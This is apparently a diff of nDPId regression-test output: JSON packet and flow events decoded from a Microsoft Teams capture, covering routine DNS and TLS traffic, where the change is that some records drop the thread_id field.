00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":649,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041679611} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":649,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041679611}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1587041680062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041680062,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFhq8AAP8RsaDAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1587041680062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041680062,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFhq8AAP8RsaDAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1587041680074,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1587041680074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB61LQAAEARImfAqAEBwKgBBgA1+i4AZgAAp0uBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA7ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1587041680074,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1587041680074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB61LQAAEARImfAqAEBwKgBBgA1+i4AZgAAp0uBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA7ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="}
00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -91,17 +91,17 @@
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"}
01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgvlVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDage6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="} 01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgvlVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDage6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041680294,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041680294,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041680611} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041680611}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1587041681218,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1587041681218,"pkt":"EBMx8Tl2KDc3AG3ICABFAABLUFkAAP8R5\/DAqAEGwKgBAd06ADUANyl9Kf0BAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAE="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1587041681218,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1587041681218,"pkt":"EBMx8Tl2KDc3AG3ICABFAABLUFkAAP8R5\/DAqAEGwKgBAd06ADUANyl9Kf0BAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAE="}
00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1587041681248,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041681248,"pkt":"KDc3AG3IEBMx8Tl2CABFAACAqEJAADkRFdPAqAEBwKgBBgA13ToAbAAAKf2BgAABAAIAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAHADAAFAAEAAADSABkFZTcyNzkFZHNjZTkKYWthbWFpZWRnZcAmwDsAAQABAAAAFAAEFzKeWA=="} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1587041681248,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041681248,"pkt":"KDc3AG3IEBMx8Tl2CABFAACAqEJAADkRFdPAqAEBwKgBBgA13ToAbAAAKf2BgAABAAIAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAHADAAFAAEAAADSABkFZTcyNzkFZHNjZTkKYWthbWFpZWRnZcAmwDsAAQABAAAAFAAEFzKeWA=="}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}}
00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":853,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":853,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":853,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041681407} 00184{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":853,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041681407}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":864,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681458,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":864,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681458,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":864,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041681611} 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":864,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041681611}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCnaYAAP8RmqzAqAEGwKgBAcdZADUALvSsiC0BAAABAAAAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAE="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCnaYAAP8RmqzAqAEGwKgBAcdZADUALvSsiC0BAAABAAAAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAE="}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -161,8 +161,8 @@
